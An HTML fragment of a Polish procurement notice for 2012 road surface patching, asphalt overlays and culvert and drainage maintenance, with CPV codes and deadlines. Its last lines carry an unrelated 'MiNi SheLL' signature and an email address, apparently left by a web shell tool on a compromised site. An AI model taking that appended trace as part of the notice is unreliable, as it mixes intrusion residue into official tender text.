<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 3 Poczesna w okresie od podpisania umowy do 30.11.2012 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 3 Poczesna w okresie od podpisania umowy do 30.11.2012 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg powiatowych po okresie zimowym wykonane do dnia 11.06.2012 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 12.06.2012 r. do 30.11.2012 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remonty cząstkowe nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową oraz wykonanie na drogach powiatowych i wojewódzkich dywaników z mieszanki mineralno - asfaltowej oraz innych robót utrzymaniowych w okresie od podpisania umowy do 31.03.2013 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remonty cząstkowe nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową oraz wykonanie na drogach powiatowych i wojewódzkich dywaników z mieszanki mineralno - asfaltowej oraz innych robót utrzymaniowych w okresie od podpisania umowy do 31.03.2013 r. 
Opis: 
1.	Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową będzie obejmować następujące etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonany 
.	na drogach powiatowych do dnia 11.06.2012 r. wg bieżących potrzeb i zleceń,
.	na drogach wojewódzkich do dnia 31.05.2012 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 12.06.2012 r. do 31.03.2013 r. dla dróg powiatowych i od 01.06.2012 r. do 31.03.2013 r. dla dróg wojewódzkich wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.
2.	Wykonanie nakładek z mieszanki mineralno - asfaltowej oraz innych robót utrzymaniowych obejmuje bieżące utrzymanie jezdni, chodników, poboczy na drogach wojewódzkich i powiatowych w okresie od podpisania umowy do dnia 31.12.2012 r. wg zleceń i zakresu robót uzgodnionego z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Remont i bieżące utrzymanie przepustów i odwodnienie korpusu drogowego na drogach powiatowych i wojewódzkich wg zleceń i zakresu robót uzgodnionego z Zamawiającym w okresie od podpisania umowy do dnia 31.12.2012 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont i bieżące utrzymanie przepustów i odwodnienie korpusu drogowego na drogach powiatowych i wojewódzkich wg zleceń i zakresu robót uzgodnionego z Zamawiającym w okresie od podpisania umowy do dnia 31.12.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com